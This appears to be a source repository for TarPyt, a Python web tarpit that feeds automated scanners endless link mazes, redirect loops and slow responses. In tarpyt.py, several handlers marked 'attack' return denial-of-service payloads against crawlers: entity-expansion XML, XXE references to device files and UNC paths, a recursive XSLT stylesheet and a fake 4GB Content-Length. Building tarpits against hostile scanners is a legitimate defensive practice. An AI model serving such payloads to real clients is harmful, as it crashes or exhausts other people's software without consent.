├── .gitignore ├── README.md ├── genmarkov.py ├── tarpyt-fcgi.py ├── tarpyt-wsgiref.py ├── tarpyt.cfg ├── tarpyt.py └── www └── robots.txt /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | *.mkv 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | TarPyt 2 | ====== 3 | TarPyt is a Python Web tarpit, inspired by a description of a PHP 4 | equivalent called [Labyrinth](https://code.google.com/p/weblabyrinth/). 5 | It's an automated scanner's worst nightmare, a maze of twisty URIs, all alike. 6 | 7 | Running TarPyt 8 | -------------- 9 | 10 | TarPyt can be run on its own, or as a 11 | [WSGI](http://wsgi.readthedocs.org/en/latest/index.html) app. In its current 12 | (testing) state, running under a separate webserver as a WSGI app has not been 13 | tested, but should work just fine. To run standalone, just run: 14 | 15 | python tarpyt.py 16 | 17 | Generating Markov chains 18 | ------------------------ 19 | 20 | The included `genmarkov.py` can be used to generate and 21 | [pickle](http://docs.python.org/library/pickle.html) a simple Markov chain for 22 | building html-like content. I've had decent luck pointing it at the 23 | [Alexa](http://www.alexa.com/topsites) top 20 web sites, downloaded with 24 | `wget`. Currently, TarPyt only uses these chains to generate urls, but full 25 | pages will be coming soon. 26 | 27 | Features 28 | -------- 29 | A random list of features, to be better organized later: 30 | 31 | * WSGI-compatible interface 32 | * "Random" different responses (HTTP redirects, link pages, etc.) 33 | * Base response on a hash of the request, so it's consistent 34 | * Generate Markov chains of HTML and URI paths for realistic responses 35 | * Infinite redirects, slow responses 36 | * Artificially slow responses (1 Bps) 37 | * Artificially large (4GB) content-length headers for agents that pre-allocate storage 38 | 39 | Todo 40 | ---- 41 | * Shell script to get top 100 Alexa sites and build markov chains 42 | * Use Markov chains to build HTML in responses 43 | * False positives for scanners: SQLi (database errors), etc. 44 | * Alerting, stats? 45 | 46 | Attacks 47 | ------- 48 | Possible ideas for cruelty to scanners/spiders: 49 | 50 | * Pathological-case compression (high resource use for recipient) 51 | * Broken markup: research edge cases for XML parsers 52 | -------------------------------------------------------------------------------- /genmarkov.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from HTMLParser import HTMLParser, HTMLParseError 4 | from optparse import OptionParser 5 | import fileinput 6 | import pickle 7 | import random 8 | import sys 9 | from codecs import open 10 | 11 | class MarkovChain(object): 12 | def __init__(self): 13 | self.words = {} 14 | self.maxcount = 0 15 | 16 | def add(self, prev_word, next_word): 17 | if not (prev_word in self.words): 18 | self.words[prev_word] = {} 19 | if not (next_word in self.words[prev_word]): 20 | self.words[prev_word][next_word] = 0 21 | self.words[prev_word][next_word] += 1 22 | self.maxcount = max(self.maxcount, self.words[prev_word][next_word]) 23 | 24 | def get(self, prev_word): 25 | if not (prev_word in self.words): 26 | return random.choice(self.words.keys()) 27 | followers = self.words[prev_word] 28 | allcounts = sum(followers.itervalues()) 29 | randval = random.randint(1,allcounts) 30 | partial_sum = 0 31 | for word, count in followers.iteritems(): 32 | partial_sum += count 33 | if partial_sum >= randval: 34 | return word 35 | 36 | class TagState(object): 37 | def __init__(self, tag='^', prev='^'): 38 | self.prev_child = prev 39 | self.tag = tag 40 | 41 | class MarkovBuilder(HTMLParser, object): 42 | def setup_chain(self): 43 | self.siblings = MarkovChain() 44 | self.children = MarkovChain() 45 | self.attrs = MarkovChain() 46 | self.data = MarkovChain() 47 | self.uripaths = MarkovChain() 48 | self.tagstack = [TagState()] 49 | self.maxsibs = 0 50 | self.maxdepth = 0 51 | self.gendepth = 0 52 | self.popped = True 53 | 54 | def handle_starttag(self, tag, attrs): 55 | self.popped = False 56 | state = self.tagstack[-1] 57 | #print >>sys.stderr, "{0: >10}{1}{2}".format(state.tag," "*len(self.tagstack), tag) 58 | if state.tag in ('meta','input','img','br','script','style','link'): 59 | self.handle_endtag(state.tag) 60 | state = self.tagstack[-1] 61 | if state.prev_child == '^': 62 | self.children.add(state.tag, tag) 63 | else: 64 | self.siblings.add(state.prev_child, tag) 65 | state.prev_child = tag 66 | prev_attr = tag 67 | for attr in attrs: 68 | if attr[0] == 'href': 69 | prev_path = '^' 70 | elems = attr[1].split('/') 71 | if len(elems) > 1 and elems[1] == '': 72 | elems = elems[3:] 73 | for elem in elems: 74 | self.uripaths.add(prev_path, elem) 75 | prev_path = elem 76 | self.uripaths.add(prev_path, '$') 77 | str_attr = u'{0}="{1}"'.format(*attr) 78 | self.attrs.add(prev_attr, str_attr) 79 | prev_attr = str_attr 80 | self.attrs.add(prev_attr, '$') 81 | newstate = TagState(tag=tag) 82 | self.tagstack.append(newstate) 83 | self.maxdepth = max(self.maxdepth, len(self.tagstack)) 84 | 85 | def handle_endtag(self, tag): 86 | state = self.tagstack.pop() 87 | if len(self.tagstack) == 0: 88 | self.tagstack = [TagState()] 89 | if state.prev_child == '^': 90 | self.children.add(state.tag, '$') 91 | if self.popped: 92 | self.siblings.add(state.tag, '$') 93 | self.popped = True 94 | 95 | def handle_startendtag(self, tag, attrs): 96 | self.handle_starttag(tag, attrs) 97 | self.handle_endtag(tag) 98 | 99 | def handle_data(self, data): 100 | self.data.add(self.tagstack[-1].tag, data) 101 | 102 | def unknown_decl(self, data): 103 | pass 104 | 105 | def save(self, filename='html.mkv'): 106 | out = open(filename, mode='wb') 107 | pickle.dump(self, out, protocol=2) 108 | 109 | def generate(self, tag='html', generate_links=False, depth=0): 110 | out = [] 111 | count = 0 112 | while tag != '$' and count <= self.siblings.maxcount: 113 | count += 1 114 | contents = [] 115 | if generate_links and tag == 'a': 116 | path = ['^'] 117 | while path[-1] != '$': 118 | path.append(self.uripaths.get(path[-1])) 119 | contents = [tag]+[u'href="/{0}"'.format('/'.join(path[1:-1]))] 120 | else: 121 | attr = tag 122 | while attr != '$': 123 | contents.append(attr) 124 | attr = self.attrs.get(attr) 125 | out.append(u'<{0}>\n'.format(' '.join(contents))) 126 | data = self.data.get(tag) 127 | if data and data != '$': 128 | out.append(data) 129 | first_child = self.children.get(tag) 130 | if first_child and first_child != '$': 131 | depth += 1 132 | if depth <= self.maxdepth: 133 | out.append(self.generate( 134 | first_child, 135 | generate_links=generate_links, 136 | depth=depth)) 137 | out.append(u'\n'.format(tag)) 138 | tag = self.siblings.get(tag) 139 | return ''.join(out) 140 | 141 | def reset(self): 142 | super(MarkovBuilder, self).reset() 143 | self.tagstack = [TagState()] 144 | 145 | class GotCharset(Exception): 146 | def __init__(self, charset): 147 | assert charset 148 | self.charset = charset 149 | 150 | class EncodingDetector(HTMLParser): 151 | def handle_starttag(self, tag, attrs): 152 | if tag == 'meta': 153 | attrhash = {} 154 | for attr in attrs: 155 | attrhash[attr[0]] = attr[1] 156 | if 'charset' in attrhash: 157 | raise GotCharset, attrhash['charset'] 158 | elif 'http-equiv' in attrhash: 159 | if attrhash['http-equiv'].lower() == 'content-type': 160 | for chunk in attrhash['content'].split(';'): 161 | if 'charset' in chunk: 162 | raise GotCharset, chunk.split('=')[-1] 163 | 164 | def parse(filenames): 165 | builder = MarkovBuilder() 166 | builder.setup_chain() 167 | for fname in filenames: 168 | filein = open(fname, mode='rb', encoding='utf-8', errors='replace') 169 | try: 170 | try: 171 | getcharset = EncodingDetector() 172 | for line in filein: 173 | getcharset.feed(line) 174 | except GotCharset as e: 175 | filein.close() 176 | filein = open(fname, mode='rb', encoding=e.charset, errors='replace') 177 | filein.seek(0) 178 | builder.feed(filein.read()) 179 | builder.close() 180 | except HTMLParseError: 181 | pass 182 | builder.reset() 183 | filein.close() 184 | return builder 185 | 186 | 187 | if __name__=='__main__': 188 | parser = OptionParser() 189 | parser.add_option('-p', '--pickle', 190 | help='Pickle the MarkovBuilder into FILE', metavar='FILE') 191 | (options, args) = parser.parse_args() 192 | builder = parse(args) 193 | if options.pickle: 194 | builder.save(options.pickle) 195 | print builder.generate() 196 | -------------------------------------------------------------------------------- /tarpyt-fcgi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from flup.server.fcgi import WSGIServer 4 | from optparse import OptionParser 5 | from tarpyt import Tarpyt 6 | 7 | if __name__=='__main__': 8 | parser = OptionParser() 9 | parser.add_option('-f', '--config', 10 | help='Tarpyt config file', metavar='FILE') 11 | (options, args) = parser.parse_args() 12 | tarpyt = Tarpyt(options.config) 13 | WSGIServer(tarpyt.application).run() 14 | -------------------------------------------------------------------------------- /tarpyt-wsgiref.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from wsgiref.simple_server import make_server 4 | from optparse import OptionParser 5 | from tarpyt import Tarpyt 6 | 7 | if __name__=='__main__': 8 | parser = OptionParser() 9 | parser.add_option('-f', '--config', 10 | help='Tarpyt config file', metavar='FILE') 11 | (options, args) = parser.parse_args() 12 | tarpyt = Tarpyt(options.config) 13 | httpd = make_server('', 8080, tarpyt.application) 14 | httpd.serve_forever() 15 | -------------------------------------------------------------------------------- /tarpyt.cfg: -------------------------------------------------------------------------------- 1 | #Config file for TarPyt 2 | [tarpyt] 3 | # A pickled instance of a genmarkov.MarkovBuilder object 4 | #markov_file= html.mkv 5 | # A directory out of which to serve files. Overrides [responses] below 6 | www_dir= ./www 7 | 8 | # Responses to use, chosen proportional to their weight 9 | [responses] 10 | # A page full of links 11 | linkpage= 7 12 | # A redirect to some other page 13 | redirect= 1 14 | # A chain of redirects that loops back on itself 15 | inf_redirect= 1 16 | # An empty response with an oversize Content-Length header 17 | oversize= 1 18 | # A response returned one byte per second 19 | slow= 1 20 | # XSL template recursion 21 | xslt_recurse= 1 22 | # external entity references large/infinite local system files 23 | xxe_dos= 1 24 | # Memory exhaustion through recursive entity definitions 25 | entity_dos= 1 26 | -------------------------------------------------------------------------------- /tarpyt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import random 4 | from zlib import adler32 5 | from ConfigParser import SafeConfigParser, NoOptionError 6 | from bisect import bisect_right 7 | import pickle 8 | import time 9 | import urllib 10 | import os 11 | #import sys #stderr 12 | 13 | from genmarkov import MarkovBuilder, TagState, MarkovChain 14 | 15 | class Tarpyt(object): 16 | def __init__(self, config=None): 17 | self.builder = None 18 | self.www_dir = None 19 | conf = SafeConfigParser() 20 | if config: 21 | if hasattr(config, 'readline'): 22 | conf.readfp(config) 23 | else: 24 | conf.read(config) 25 | if conf.has_section('tarpyt'): 26 | try: 27 | mkvfile = conf.get('tarpyt','markov_file') 28 | mfile = open(mkvfile, 'rb') 29 | self.set_builder(pickle.load(mfile)) 30 | except NoOptionError: 31 | self.builder = None 32 | try: 33 | www = conf.get('tarpyt', 'www_dir') 34 | self.www_dir = os.path.abspath(www) if os.path.isdir(www) else None 35 | except NoOptionError: 36 | self.www_dir = None 37 | self.weight_total = 0 38 | self.responses = [] 39 | if conf.has_section('responses'): 40 | def update(response): 41 | self.responses.append( 42 | getattr(self, 'response_' + response[0]) ) 43 | self.weight_total += int(response[1]) 44 | return self.weight_total 45 | self.weights = map(update, 46 | sorted( conf.items('responses'), key=lambda x: int(x[1]) )) 47 | else: 48 | self.responses.append(self.response_linkpage) 49 | self.weights = [1] 50 | self.weight_total = 1 51 | 52 | def getresponse(self, key): 53 | index = adler32(key) % self.weight_total 54 | i = bisect_right(self.weights, index) 55 | r = self.responses[i] 56 | return self.responses[bisect_right(self.weights, index)] 57 | 58 | def getlink(self, path='/'): 59 | next_path = path.rstrip('/') + '/{0}' 60 | return next_path.format(chr(random.randint(0x61,0x7A))) 61 | 62 | def set_builder(self, builder): 63 | self.builder = builder 64 | def getlink(path='/'): 65 | pathlist = ['^'] 66 | pathlist.extend(filter(lambda x: x, path.split('/'))) 67 | elem = self.builder.uripaths.get(pathlist[-1]) 68 | if elem == '$': 69 | elem = self.builder.uripaths.get(None) 70 | return '/'+'/'.join(pathlist[1:]+[elem]) 71 | self.getlink = getlink 72 | 73 | def response_slow(self, environ, start_response): 74 | """ Category: tarpit 75 | Returns an html page, but very slowly 76 | """ 77 | content = None 78 | if self.builder: 79 | content = self.builder.generate(generate_links=True) 80 | else: 81 | content = u"A" * 4096 82 | status = '200 OK' 83 | headers = [('Content-Length',str(len(content)))] 84 | start_response(status, headers) 85 | for char in content.encode('utf-8'): 86 | yield char 87 | time.sleep(1) 88 | 89 | def response_linkpage(self, environ, start_response): 90 | """ Category: tarpit 91 | Returns an html page full of links 92 | """ 93 | response_body = None 94 | if self.builder: 95 | response_body = self.builder.generate(generate_links=True) 96 | else: 97 | page_string = "Welcome to the Labyrinth" 98 | link_string = '
  • {0}
  • ' 99 | links = [] 100 | prev_href = '' 101 | for n in range(0,5): 102 | href = self.getlink(os.path.normpath(environ['SCRIPT_NAME']+'/'+environ['PATH_INFO'])) 103 | links.append(link_string.format(href)) 104 | response_body = page_string.format(''.join(links)) 105 | status = '200 OK' 106 | start_response(status, []) 107 | if isinstance(response_body, unicode): 108 | response_body = response_body.encode('utf-8') 109 | return [response_body] 110 | 111 | def response_redirect(self, environ, start_response): 112 | """ Category: realism 113 | Redirects to a random page 114 | """ 115 | status = '302 Found' 116 | location = self.getlink(environ['SCRIPT_NAME']) 117 | if isinstance(location, unicode): 118 | location = urllib.quote(location.encode('utf-8')) 119 | headers = [('Location', location)] 120 | start_response(status, headers) 121 | return "" 122 | 123 | def response_inf_redirect(self, environ, start_response): 124 | """ Category: tarpit 125 | Returns a 302 redirect to a page which has the same modulus as the 126 | one requested, resulting in an infinite redirect. Loops eventually. 127 | If a suitable redirect cannot be made, falls back to appending a 128 | random path element to the path requested. 129 | """ 130 | newpath = environ['PATH_INFO'] 131 | modulus = self.weight_total 132 | tmp = 0 133 | chord = 0 134 | pos = len(newpath) - 1 135 | while pos > 0: 136 | chord = ord(newpath[pos]) 137 | tmp = chord + modulus 138 | while tmp != chord: 139 | if tmp > ord('z'): 140 | tmp %= modulus 141 | if (tmp >= 0x30 and tmp <= 0x39) \ 142 | or (tmp >= 0x41 and tmp <= 0x5A) \ 143 | or (tmp >= 0x61 and tmp <= 0x7A): 144 | break 145 | tmp += modulus 146 | if tmp == chord: 147 | pos -= 1 148 | else: 149 | break 150 | if pos != 0: 151 | newpath = newpath[:pos] + chr(tmp) + newpath[pos+1:] 152 | else: 153 | newpath = self.getlink(newpath) 154 | status = '302 Found' 155 | if isinstance(newpath, unicode): 156 | newpath = urllib.quote(newpath.encode('utf-8')) 157 | headers = [('Location', os.path.normpath(environ['SCRIPT_NAME']+'/'+newpath))] 158 | start_response(status, headers) 159 | return "" 160 | 161 | def response_oversize(self, environ, start_response): 162 | """ Category: attack 163 | Sends an oversized Content-Length header. Some web servers have had 164 | Denial of Service vulnerabilities due to preallocating memory or disk 165 | (e.g. https://secunia.com/advisories/35645). Some spiders may have 166 | similar vulns (See, e.g., feature request for wget: 167 | https://lists.gnu.org/archive/html/bug-wget/2012-01/msg00054.html) 168 | """ 169 | status = '200 OK' 170 | headers = [('Content-Length', str(4 * 2**30))] 171 | start_response(status, headers) 172 | return ["",""] #Prevent WSGI from calculating content-length 173 | 174 | def response_entity_dos(self, environ, start_response): 175 | """ Category: attack 176 | Sends a malicious XML document that triggers a denial of service through 177 | entity expansions. 178 | 179 | Reference: CWE-776 (http://cwe.mitre.org/data/definitions/776.html) 180 | """ 181 | status = '200 OK' 182 | headers = [('Content-type', 'application/xml')] 183 | start_response(status, headers) 184 | return """ 185 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | ]> 198 | &spam; 199 | """ 200 | 201 | def response_xxe_dos(self, environ, start_response): 202 | """ Category: attack 203 | Sends a malicious XML document that triggers a denial of service through 204 | Xml eXternal Entity references. Works best against *nix by reading from 205 | devices that never close. On Windows, currently tries to read 206 | pagefile.sys and access a probably-nonexistent server via UNC path. See 207 | http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html 208 | """ 209 | status = '200 OK' 210 | headers = [('Content-type', 'application/xml')] 211 | start_response(status, headers) 212 | return """ 213 | 215 | 216 | 217 | ]> 218 | &r;&p;&u; 219 | """ 220 | 221 | def response_xslt_recurse(self, environ, start_response): 222 | """ Category: attack 223 | Sends an XSL stylesheet containing an infinite recursion. The 224 | stylesheet, itself XML, references itself as its own stylesheet to begin 225 | the transform process, and the root template calls itself. 226 | """ 227 | status = '200 OK' 228 | headers = [('Content-type', 'application/xml')] 229 | start_response(status, headers) 230 | return """ 231 | 232 | 233 | 234 | SPAM 235 | 236 | 237 | 238 | """.format(os.path.normpath(environ['SCRIPT_NAME']+'/'+environ['PATH_INFO'])) 239 | 240 | def application(self, environ, start_response): 241 | verb = environ['REQUEST_METHOD'] 242 | path = os.path.normpath('/'+environ['PATH_INFO']) 243 | if self.www_dir: 244 | filepath = os.path.normpath( os.path.sep.join((self.www_dir, path)) ) 245 | if filepath.startswith(self.www_dir): 246 | try: 247 | serve = open(filepath, 'rb') 248 | body = [serve.read()] 249 | start_response('200 OK', []) 250 | return body 251 | except Exception as e: 252 | pass 253 | return self.getresponse(verb + path)(environ, start_response) 254 | 255 | -------------------------------------------------------------------------------- /www/robots.txt: -------------------------------------------------------------------------------- 1 | User-Agent: * 2 | Disallow: / 3 | --------------------------------------------------------------------------------